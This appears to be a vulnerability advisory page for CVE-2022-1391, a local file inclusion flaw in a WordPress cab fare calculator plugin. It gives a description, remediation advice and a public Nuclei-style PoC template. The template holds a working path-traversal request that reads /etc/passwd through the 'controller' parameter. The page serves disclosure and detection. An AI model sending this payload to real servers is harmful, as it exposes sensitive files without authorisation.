CVE-2022-1391: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress | POC: 已公开

漏洞描述

The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

PoC代码[已公开]

id: CVE-2022-1391

info:
  name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
  author: Splint3r7
  severity: critical
  description: |
    The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50843
    - https://wordpress.org/plugins/cab-fare-calculator
    - https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1391
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1391
    cwe-id: CWE-22
    epss-score: 0.66708
    epss-percentile: 0.98498
    cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: kanev
    product: cab_fare_calculator
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202f535d6fb8c291d0baff25019ae854f03d84b72c49f98dca5654a441ebfbc519022100ac9723fd8f631af9fcd2339bf2651f1cdac26d39336882e43d65a8d523b0bba7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐